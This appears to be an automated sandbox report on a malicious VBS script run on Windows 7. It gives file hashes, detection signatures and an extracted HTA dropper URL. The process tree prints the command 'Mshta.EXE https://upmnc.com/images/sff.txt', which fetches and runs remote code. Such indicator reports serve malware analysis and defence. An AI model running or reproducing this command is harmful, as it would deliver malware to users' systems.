Analysis

  • max time kernel
    42s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2022 08:09

General

  • Target

    NBSL542S5W.VBS.vbs

  • Size

    1KB

  • MD5

    82b5e95dbb2e142da5ed868a01c8358e

  • SHA1

    7c23444c67fe2f2e663635a8789276060da56af5

  • SHA256

    a9ce91d25970df14a0a489bbeb9976adb7dcf7fc122b7e17df8aae35b6c0f986

  • SHA512

    74d00a47d6ffebf295e803b660cb6806e20228cc491b9cb0baf7a56f4230d35cde5ac87d77d371baeda6bf82b04a6ad571397eda701c8e3c60c40474c0d27c9a

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://upmnc.com/images/sff.txt

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\NBSL542S5W.VBS.vbs"
    1⤵
      PID:1752
    • C:\Windows\system32\Mshta.EXE
      Mshta.EXE https://upmnc.com/images/sff.txt
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      PID:1692

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1692-54-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp

      Filesize

      8KB